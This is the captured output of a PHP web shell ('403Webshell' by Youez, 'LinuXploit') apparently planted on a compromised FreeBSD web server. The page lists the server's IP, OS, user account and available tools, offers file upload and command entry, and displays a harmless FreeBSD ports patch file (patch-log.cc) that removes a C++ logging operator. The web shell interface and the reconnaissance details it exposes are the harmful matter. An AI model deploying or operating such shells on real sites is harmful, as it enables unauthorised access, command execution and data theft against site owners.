403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/devel/ccdoc/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/devel/ccdoc/files/patch-log.cc
log.cc:236:8: error: invalid operands to binary expression ('std::__1::ostream' (aka 'basic_ostream<char>') and 'std::__1::ostream')
        (*os) << fct( *os );
                ~~~~~ ^  ~~~~~~~~~~

Never used

--- log.cc.orig	2018-08-26 04:28:55 UTC
+++ log.cc
@@ -225,20 +225,6 @@ ccdoc::log& ccdoc::log::operator << (const vector<stri
   return *this;
 }
 // ================================================================
-// operator <<
-// ================================================================
-ccdoc::log& ccdoc::log::operator << (ostream& (fct)(ostream&) ) {
-  if(m_output_flag) {
-    vector<ostream*>::iterator i = m_os.begin();
-    for( ; i!=m_os.end(); ++i) {
-      ostream* os = *i;
-      if(os)
-	(*os) << fct( *os );
-    }
-  }
-  return *this;
-}
-// ================================================================
 // Warning
 // ================================================================
 ccdoc::log& ccdoc::log::warning() {

Youez - 2016 - github.com/yon3zu
LinuXploit